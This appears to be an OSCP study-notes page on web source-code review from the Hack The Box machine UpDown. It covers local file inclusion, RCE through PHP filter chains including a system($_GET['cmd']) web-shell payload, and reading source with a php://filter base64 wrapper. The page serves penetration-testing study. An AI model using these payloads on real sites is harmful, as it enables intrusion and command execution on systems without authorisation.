> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/source-code.md).

# Source Code

## LFI

UpDown HTB

<figure><img src="/files/7I5gAlxQJnFBMXWN2TRT" alt=""><figcaption></figcaption></figure>

* Direct Access set to false
* Get the page
* **If the page doesn't have /bin, usr, home, var, etc**
* **Then it does an include on the page variable and appends .php (on any file)**
* Else, it includes checker.php

## RCE via PHP filters

It's possible to get command execution just through **$\_GET\['page']**&#x20;

{% embed url="<https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters>" %}

```
python3 php_filter_chain_generator.py --chain "<?php phpinfo(); ?>"
```

Take the output and append it to **/?page=**

<figure><img src="/files/A3t60cbELOkPngGFBLbA" alt=""><figcaption></figcaption></figure>

If system isn't a disabled function this can be used

```
<?php system($_GET["cmd"]); ?>
```

{% embed url="<https://github.com/RoqueNight/LFI---RCE-Cheat-Sheet>" %}

## Reading Local Files

We can pull the index.php file encoded in base64 using this wrapper in the GET request

```
/?page=php://filter/convert.base64-encode/resource=index
```

<figure><img src="/files/DbCWUeIvnWSRwNhcWqEU" alt=""><figcaption></figcaption></figure>

Good example:

{% embed url="<https://htb.adot8.com/hack-the-box/oscp-like-boxes/updown/foothold>" %}

## Authentication Bypass via strcmp in PHP
